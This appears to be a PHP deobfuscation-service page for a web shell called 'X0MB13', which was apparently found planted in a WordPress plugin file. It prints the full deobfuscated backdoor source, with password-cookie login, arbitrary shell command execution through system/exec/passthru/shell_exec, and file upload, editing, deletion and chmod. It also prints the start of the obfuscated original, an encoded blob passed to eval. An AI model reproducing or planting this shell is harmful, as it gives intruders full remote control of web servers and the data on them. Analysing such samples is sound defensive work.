Back to listTags
URLshttp://www.twitter.com/X0MB13_
http://www.fb.com/xombie.xombie.7
EmailsX0MB13@REBORN.COM
Title' . getenv('HTTP_HOST') . ' => X0MB13
Executionsystem
eval
exec
passthru
shell_exec
Input_GET
_POST
Environmenterror_reporting
php_uname
getcwd
Deobfuscated code
<br />
<b>Warning</b>: ob_start(): output handler 'ob_gzhandler' conflicts with 'zlib output compression' in <b>/home/aravalcl/public_html/wp/wp-content/plugins/seo/alfa-index.php(3) : eval()'d code(1) : eval()'d code</b> on line <b>3245</b><br />
<?php
/**
**/
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
$sym = "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";
eval /* PHPDeobfuscator eval output */ {
error_reporting(0);
$xyn = 'tunafeesh';
if (isset($_POST['pass'])) {
if ($_POST['pass'] == $password) {
setcookie($xyn, $_POST['pass'], time() + 3600);
}
let_him_in();
}
if (!empty($password) && !isset($_COOKIE[$xyn]) or $_COOKIE[$xyn] != $password) {
initiate();
die;
}
$me = basename("/var/www/html/input.php");
$server_soft = $_SERVER["SERVER_SOFTWARE"];
$uname = php_uname();
$cur_user = get_current_user() . ' uid:' . getmyuid() . ' gid:' . getmygid();
$safe_mode = ini_get('safe_mode');
$safe_mode = $safe_mode ? '<font color:crimson>ON</font>' : '<font color=#ccff00>OFF</font>';
$cwd = getcwd();
$bckC = '#333333';
$txtC = '#999999';
$start = '<html><head><title>' . getenv('HTTP_HOST') . ' => X0MB13</title><style>body {background:' . $bckC . ';color:' . $txtC . ';font-size:9pt;font-family:Trebuchet MS,cursive,sans serif;}h1#n{position:fixed;top:10px;left:10px;text-shadow:0px 0px 5px black;color:#79a317;}h1#nm{text-shadow:0px 0px 5px black;color:#79a317;}a {color:' . $txtC . ';text-decoration:none;font-family:Comic Sans Ms,cursive,sans serif;}a:hover {color:#79a317;}hr {background:' . $txtC . ';color:black;}p#bck{position:fixed;top:20px;right:20px;}#menu {position:fixed;bottom:0px;width:100%;font-size:13pt;}#menuB {background:' . $bckC . ';box-shadow:0px 0px 10px black;border-radius:15px;padding:5px 20px 5px 20px;}table#moreI{font-size:9pt;background:' . $bckC . ';border-radius:10px;box-shadow:0px 0px 10px black;padding:5px;position:fixed;bottom:40px;right:40px;display:none;}p#cp {font-size:11pt;}table#lt {font-size:10pt;}input#lt,input#sv {background:' . $bckC . ';border-radius:10px;border:1px solid ' . $txtC . ';color:' . $txtC . ';text-align:center;}input#ltb {background:rgba(0,0,0,0);border-radius:10px;color:' . $txtC . ';box-shadow:0px 0px 1px ' . $txtC . ';border:0px solid rgba(0,0,0,0);}table#ft {font-size:9pt;padding:5px;border-radius:10px;box-shadow:0px 0px 10px black;}td#fh {border-bottom:1px solid ' . $txtC . ';padding-bottom:3px;}tr#fn:hover{box-shadow:0px 0px 5px black;}h3 {text-shadow:0px 0px 4px black;font-size:13pt;}textarea#edit {background:' . $bckC . ';color:' . $txtC . ';box-shadow:0px 0px 10px black;border-radius:10px;border:none;padding:10px;}</style><script type="text/javascript">function get_inf() {if(document.getElementById(\'moreI\').style.display=="block"){document.getElementById(\'moreI\').style.display="none"}else {document.getElementById(\'moreI\').style.display="block";}} function xyn(id1,id2) {document.getElementById(id1).style.display="block";document.getElementById(id2).style.display="none";}</script></head><body><h1 id="n"><a href="?x=x">X0MB13</a></h1>';
$menu = '<center><p id="menu"><span id="menuB"><<a href="' . $me . '">Home</a>> <<a href="?x=cmd&d="' . realpath('.') . '">Command</a>> <<a href="?x=php&d="' . realpath('.') . '">PHP</a>> <<a href="javascript:get_inf();">Info</a>> <<a href="?x=q">Logout</a>> </span></p></center>';
$end = '</body></html>';
$inf = '<center><p id="inf">||| <b><i><u>Software:</u></i></b> ' . $server_soft . ' ||| <b><i><u>Uname:</u></i></b> ' . $uname . ' |||</br>||| <b><i><u>User:</u></i></b> ' . $cur_user . ' ||| <b><i><u>Safe Mode:</u></i></b> ' . $safe_mode . ' ||| <b><i><u>Directory: </i></b></u>' . $cwd . ' |||</p></center><hr>';
print $start;
print $menu;
print $inf;
$moreI = array('PHP Version' => phpversion(), 'Zend Version' => zend_version(), 'Magic Quotes' => magic_quotes(), 'Curl' => curl(), 'Register Globals' => reg_globals(), 'OpenBase Dir' => openbase_dir(), 'MySQL' => myql(), 'Gzip' => gzip(), 'MsSQL' => mssql(), 'PostgreSQL' => postgresql(), 'Oracle' => oracle(), 'Total Space' => h_size(disk_total_space('/')), 'Used Space' => h_size(disk_free_space('/')), 'Your IP' => $_SERVER['REMOTE_ADDR'], 'Server IP' => $_SERVER['SERVER_ADDR']);
print "<table id=\"moreI\">";
foreach ($moreI as $n => $v) {
print '<td>' . $n . '</td><td> :> </td><td> ' . $v . '</td><tr>';
}
print "<td colspan=3 align=\"center\"><a href=\"?x=phpinf\" target=\"_blank\">PHPInfo</a></td></table>";
if (isset($_GET['d'])) {
chdir($_GET['d']);
}
if (isset($_REQUEST['x'])) {
print '<p id="bck"><a href="?d=' . realpath('.') . '">BACK</a></p>';
switch ($_REQUEST['x']) {
case 'c':
if (isset($_POST['edit_form'])) {
$f = $_GET['f'];
$e = fopen($f, 'w') or print "<p id=\"nn\">Error Opening File</p>";
fwrite($e, $_POST['edit_form']) or print "<p id=\"nn\">Couldn't Save File</p>";
fclose($e);
}
print '<center><p>Editing ' . $_GET['f'] . ' (' . perms($_GET['d'] . $_GET['f']) . ') .</p></br></br><form action="?x=c&d=' . realpath('.') . '&f=' . $_GET['f'] . '" method="POST"><textarea cols=90 rows=15 name="edit_form" id="edit">';
if (file_exists($_GET['f'])) {
$c = file($_GET['f']);
foreach ($c as $l) {
print htmlspecialchars($l);
}
}
print "</textarea></br></br><input type=\"submit\" value=\"Save\" id=\"sv\"></form></center>";
break;
case 'cmd':
print '</br></br><center><h3>Execute Command</h3><form action="?x=cmd&d=' . realpath('.') . '" method="POST"><input type="text" value="" name="cmd" id="lt"> <input type="submit" value="Go" id="lt"></form></br><textarea cols=90 rows=15 id="edit">';
if (isset($_POST['cmd'])) {
$cmd = $_POST['cmd'];
execute(exec_meth(), $cmd);
}
print "</textarea></center>";
break;
case 'php':
print '</br></br><center><h3>PHP Code</h3><form action=?x=php&d="' . realpath('.') . '" method="POST"><input type="text" value="" name="pcode" id="lt"> <input type="submit" value="Go" id="lt"></form></br><textarea cols=90 rows=15 id="edit">';
print "</textarea></center>";
break;
case 'phpinf':
phpinfo();
break;
case 'q':
setcookie($xyn, '', time() - 3600);
let_him_in();
break;
case 'x':
print "</br></br></br><center><h1 id=\"nm\">H1 7H15 15 X0MB13</h1><h3>Mail: <a href=\"mailto:X0MB13@REBORN>COM\">X0MB13@REBORN.COM</a></h3><h3>Twitter: <a href=\"http://www.twitter.com/X0MB13_\" target=\"_blank\">X0MB13</a></h3><h3>Facebook: <a href=\"http://www.fb.com/xombie.xombie.7\" target=\"_blank\">X0MB13</a></h3></center>";
break;
}
} else {
if (isset($_GET['d'])) {
chdir($_GET['d']);
}
if (isset($_GET['ndir'])) {
$d = $_GET['d'];
$n = $_GET['ndir'];
mkdir($d . DIRECTORY_SEPARATOR . $n);
}
if (isset($_POST['new'])) {
$n = $_POST['new'];
$o = $_POST['old'];
$d = $_POST['d'];
rename($d . DIRECTORY_SEPARATOR . $o, $d . DIRECTORY_SEPARATOR . $n);
}
if (isset($_GET['deld'])) {
$d = $_GET['deld'];
rmdir($d);
}
if (isset($_GET['delf'])) {
$d = $_GET['delf'];
unlink($d);
}
if (isset($_GET['ch'])) {
$ch = $_GET['ch'];
$d = $_GET['df'];
chmod($d, $ch);
}
if (isset($_FILES['upfile']['name'])) {
$d = realpath('.') . DIRECTORY_SEPARATOR . basename($_FILES['upfile']['name']);
move_uploaded_file($_FILES['upfile']['tmp_name'], $d);
}
print '<p align="center" id="cp">' . curpath('') . '</p>';
print '<table width=90% align="center" id="lt"cellpadding="0"><td align="center"><form action="?d=' . realpath('.') . '" method="GET">Create Dir: <input type="hidden" name="d" value="' . realpath('.') . '" id="lt"><input type="text" value="" name="ndir" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d="' . realpath('.') . '" method="GET">Create File: <input type="hidden" value="' . realpath('.') . '" name="d" id="lt"><input type="hidden" value="c" name="x"><input type="text" value="" name="f" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?x=cmd&d=' . realpath('.') . '" method="POST">Command: <input type="text" value="" name="cmd" id="lt"> <input type="submit" value="Go" id="lt"></form></td><td align="center"><form action="?d=' . realpath('.') . '" method="POST" enctype="multipart/form-data">Upload: <input type="hidden" value="100000000" name="MAX_FILE_SIZE"><input type="file" name="upfile" id="ltb"> <input type="submit" value="Go" id="lt"></form></td></table>';
print "</br>";
$filex = array();
$dirx = array();
print "<table width=\"75%\" align=\"center\" id=\"ft\" ><td id=\"fh\"><b>Name</b></td><td id=\"fh\" align=\"center\"><b>Permissions</b></td><td id=\"fh\" align=\"center\"><b>Owner</b></td><td id=\"fh\" align=\"center\"><b>Options</b></td><tr id=\"fn\">";
if ($handle = opendir('.')) {
while (false !== ($file = readdir($handle))) {
if (is_dir($file)) {
$dirx[] .= $file;
} else {
$filex[] .= $file;
}
}
asort($filex);
asort($dirx);
$i = 0;
foreach ($dirx as $file) {
if (function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {
$own = posix_getpwuid(fileowner($file));
$grp = posix_getgrgid(filegroup($file));
} else {
$own['name'] = '???';
$grp['name'] = '???';
}
print '<td id="fc"><span id="n' . $file . '"><a href="?d=' . realpath($file) . '">' . $file . '</a></span><span id="r' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="POST"><input type="hidden" value="' . realpath('.') . '" name="d"> <input type="text" value="' . $file . '" id="lt" name="new"><input type="hidden" value="' . $file . '" name="old"> <input type="submit" id="lt" value="Rename"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'n' . $file . '\',\'r' . $file . '\');"></form></span><span id="d' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="GET">Are you Sure?<input type="hidden" value="' . realpath($file) . '" name="deld"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onClick="xyn(\'n' . $file . '\',\'d' . $file . '\')"></form></span></td><td id="fc" align="center"><span id="h' . $file . '"><a href="javascript:xyn(\'c' . $file . '\',\'h' . $file . '\');"><font color="' . get_color($file) . '">' . perms($file) . '</font></a></span><span id="c' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="GET"><input type="hidden" value="' . realpath($file) . '" name="df"><input type="text" value="' . perms($file) . '" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'h' . $file . '\',\'c' . $file . '\');"></form></span></td><td id="fc" align="center">' . $own['name'] . ' : ' . $grp['name'] . '</td>';
if ($i == 0 or $i == 1) {
print "<td id=\"fc\"></td><tr id=\"fn\">";
} else {
print '<td id="fc" align="center"><a href="javascript:xyn(\'r' . $file . '\',\'n' . $file . '\')">[R]</a> <a href="javascript:xyn(\'d' . $file . '\',\'n' . $file . '\')">[D]</a></td><tr id="fn">';
}
$i++;
}
foreach ($filex as $file) {
if (function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {
$own = posix_getpwuid(fileowner($file));
$grp = posix_getgrgid(filegroup($file));
} else {
$own['name'] = '???';
$grp['name'] = '???';
}
print '<td id="fc"><span id="n' . $file . '"><a href="?x=c&d=' . realpath('.') . '&f=' . $file . '">' . $file . '</a></span><span id="r' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="POST"><input type="hidden" value="' . realpath('.') . '" name="d"> <input type="text" id="lt" value="' . $file . '" name="new"><input type="hidden" value="' . $file . '" name="old"><input type="submit" id="lt" value="Rename"><input type="button" id="lt" value="Cancel" onClick="xyn(\'n' . $file . '\',\'r' . $file . '\');"></form></span><span id="d' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="GET">Are you Sure?<input type="hidden" value="' . realpath($file) . '" name="delf"> <input type="submit" value="Yes" id="lt"> <input type="button" id="lt" value="No" onClick="xyn(\'n' . $file . '\',\'d' . $file . '\')"></form></span></td><td id="fc" align="center"><span id="h' . $file . '"><a href="javascript:xyn(\'c' . $file . '\',\'h' . $file . '\');"><font color="' . get_color($file) . '">' . perms($file) . '</font></a></span><span id="c' . $file . '" style="display:none;"><form action="?d=' . realpath('.') . '" method="GET"><input type="hidden" value="' . realpath($file) . '" name="df"><input type="text" value="' . perms($file) . '" id="lt" name="ch"> <input type="submit" id="lt" value="Go"> <input type="button" id="lt" value="Cancel" onClick="xyn(\'h' . $file . '\',\'c' . $file . '\');"></form></span></td><td id="fc" align="center">' . $own['name'] . ' : ' . $grp['name'] . '</td><td id="fc" align="center"><a href="javascript:xyn(\'r' . $file . '\',\'n' . $file . '\')">[R]</a> <a href="javascript:xyn(\'d' . $file . '\',\'n' . $file . '\');">[D]</a></td><tr id="fn">';
}
}
print "</table></br></br></br>";
}
function openbase_dir()
{
$x = ini_get('open_basedir');
if (!$x) {
$o = '<font color=#ccff00>OFF</font>';
} else {
$o = '<font color=crimson>ON</font>';
}
return $o;
}
function magic_quotes()
{
$x = get_magic_quotes_gpc();
if (empty($x)) {
$m = '<font color=#ccff00>OFF</font>';
} else {
$m = '<font color=crimson>ON</font>';
}
return $m;
}
function curl()
{
if (extension_loaded('curl')) {
$c = '<font color=crimson>ON</font>';
} else {
$c = '<font color=#ccff00>OFF</font>';
}
return $c;
}
function reg_globals()
{
if (ini_get('reqister_globals')) {
$r = '<font color=crimson>ON</font>';
} else {
$r = '<font color=#ccff00>OFF</font>';
}
return $r;
}
function oracle()
{
if (function_exists('ocilogon')) {
$o = '<font color=crimson>ON</font>';
} else {
$o = '<font color=#ccff00>OFF</font>';
}
return $o;
}
function postgresql()
{
if (function_exists('pg_connect')) {
$p = '<font color=crimson>ON</font>';
} else {
$p = '<font color=#ccff00>OFF</font>';
}
return $p;
}
function myql()
{
if (function_exists('mysql_connect')) {
$m = '<font color=crimson>ON</font>';
} else {
$m = '<font color=#ccff00>OFF</font>';
}
return $m;
}
function mssql()
{
if (function_exists('mssql_connect')) {
$m = '<font color=crimson>ON</font>';
} else {
$m = '<font color=#ccff00>OFF</font>';
}
return $m;
}
function gzip()
{
if (function_exists('gzencode')) {
$m = '<font color=crimson>ON</font>';
} else {
$m = '<font color=#ccff00>OFF</font>';
}
return $m;
}
function h_size($s)
{
if ($s >= 1073741824) {
$s = round($s / 1073741824 * 100) / 100 . 'GB';
} elseif ($s >= 1048576) {
$s = round($s / 1048576 * 100) / 100 . 'MB';
} elseif ($s >= 1024) {
$s = round($s / 1024 * 100) / 100 . 'KB';
} else {
$s .= 'B';
}
return $s;
}
function curpath($d)
{
if ($d == '') {
$d = getcwd();
}
$p = '';
$n = '';
$dx = explode(DIRECTORY_SEPARATOR, $d);
for ($i = 0; $i < count($dx); $i++) {
$g = $dx[$i];
$p .= $dx[$i] . DIRECTORY_SEPARATOR;
$n .= '<a href="?d=' . $p . '">' . $g . '</a>' . DIRECTORY_SEPARATOR;
}
return $n;
}
function get_color($f)
{
if (is_writable($f)) {
$c = '#ccff00';
}
if (!is_writable($f) && is_readable($f)) {
$c = '' . $txtC . '';
}
if (!is_writable($f) && !is_readable($f)) {
$c = 'crimson';
}
return $c;
}
function perms($f)
{
if (file_exists($f)) {
return substr(sprintf('%o', fileperms($f)), -4);
} else {
return '???';
}
}
function exec_meth()
{
if (function_exists('passthru')) {
$m = 'passthru';
}
if (function_exists('exec')) {
$m = 'exec';
}
if (function_exists('shell_exec')) {
$m = 'shell_exec';
}
if (function_exists('system')) {
$m = 'system';
}
if (!isset($m)) {
$m = 'Disabled';
}
return $m;
}
function execute($m, $c)
{
if ($m == 'passthru') {
passthru($c);
} elseif ($m == 'system') {
system($c);
} elseif ($m == 'shell_exec') {
print shell_exec($c);
} elseif ($m == 'exec') {
exec($c, $r);
foreach ($r as $o) {
print $o . '</br>';
}
} else {
print "dafuq?";
}
}
function initiate()
{
print '<table border=0 width=100% height=100% align=center style="background:#333333;color:silver;"><td valign="middle"><center><form action="' . basename("/var/www/html/input.php") . '" method="POST">Password <input type="password" maxlength="10" name="pass" style="background:#333333;color:silver;border-radius:10px;border:1px solid silver;text-align:center;"> <input type="submit" value=">>" style="background:#333333;color:silver;border-radius:10px;border:1px solid silver;"></form></center></td></table>';
}
function let_him_in()
{
header("Location: " . basename("/var/www/html/input.php"));
}
print $end;
};
Original code
<br />
<b>Warning</b>: ob_start(): output handler 'ob_gzhandler' conflicts with 'zlib output compression' in <b>/home/aravalcl/public_html/wp/wp-content/plugins/seo/alfa-index.php(3) : eval()'d code(1) : eval()'d code</b> on line <b>3245</b><br />
<?php
/**
**/
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
$sym = "7Rv9aptT8uf2vf4PG0wN0lLRVJw2SiHI1a7t3l0bO8rHeJ3k8UuygCUVwSI4g6v//XNpAQFPtpy73nSTOHNqdHN0dHN0c4eFM1OZwbhSmRObq86wq37xbHu+MDXFZFov5NyOFOiKw0F529zptI3jo9Ozaorl2bbyodslNzBH7dS0Nj7MKAtgGJB8V69w3k6yPUWF7REnQWyn++jw6yHMvSYJaowoQY3Y7EBGWfyAp5az6JSIPnxVHuTsXBwd/fRp+g6Jf+gSylWt706JG+TWjJ3YZmBXlQQxl5O0Rq4tPZubHvBvGK/e/jw1jK7atjm74sywduh1euNnbfLn6cm7lvx6nB69OvvLi5N264PaaRFGsyLLEEJAte27zGOBgLaCFU6DZNMRHZ1hXyFhHIyVPgylC2sUXata1wq7YG2Qv5HSgHjAtQEjHaXoRSrjnc1m92xUmYTUZ4hCE8rGPotGm5r60beTAWnrV2pcgdAOfD8Mh1D96NWrAgT4nwXIOvxPSZb+9YWmHByKP4raaeYOtr8Rf9BA2rbjMVRGJpGTJvok4l6gQpzYVrguFsXNq47y5uzs2GsD6kpjwZpB/jq8PB8dQQYSY287C/i1pMGC3Cw9/23FqHiiR8T8fVKVWII2zg965PaxHf/Cx99LjnmFXhoni/EZ41jXj7hQLkJ7IH47vuI92zN6AiqIUGgdjQ7MG4vaYA7UHIfxnAeqUK3xdXXN1YSHjnxl+BxziLyAzsbQJvjzFfwsE+Av4+fg2Tfe4eiZpJne3AvFIzf1Ugn8gPuUbII3k5q8srYLmsY+OcXFXNqNi/PGEQXLzXZiGHFowXNmVzjJ4do6AGQ3yeYJV4TFq8iRj+uDlJsuqYMuqePQFNeuzuLAiUCSwy9YuhodgrIk7vkOUi/pvC5PR1QmwyV5c84eMy+IXXs8AuGqlhcE4MDGKOgnucQlk463WfhOVxl/e0Y1mB1GSogjidu5KVqtNlji6VNh4jGIeivxFkWzIGHfIiXOUyMUj+Q6ZCojUByJWstoYKQnH+yrnTJ5SwhpjVTAu1qTOCBoC6hMoZfEK2bsg+vieTPxsjIhWy29zrAn/mmbJq1GYZIm/JQBBJfDgsvqFJl1wop1Q51yUtxbi3gnOAgjS5lRzDTXJKl5mhzkQ9gYOwhauelhGubZef9oZ1UaPcTTAqS+RBDacNw74E7s7OkY77V/V5YhLDKXoxhLQgbSLUJ5CCWWUJyFxbUWMjX4m2rlyd6WHrqmj5ZCMN7Fc9iRqU5AfRc2uoMxYJpjfDxfvA067xWxId9QJBDk+9me0LTWMqH+aKt7ZmLUFmXfTfPE5uQTsOW86m1airVAAtGJg0QvDp5napMEiF3EaaM8duZeyFuIR58McRTFawgRaFHiAIBN+sQjEeOh1m0+1+YtPY+hHiKMZxGM0bVPLJYbSp9LAhU7Adu2PLN1n1BUTg/MJ+V9paW/oSlUgjqZlCfz0+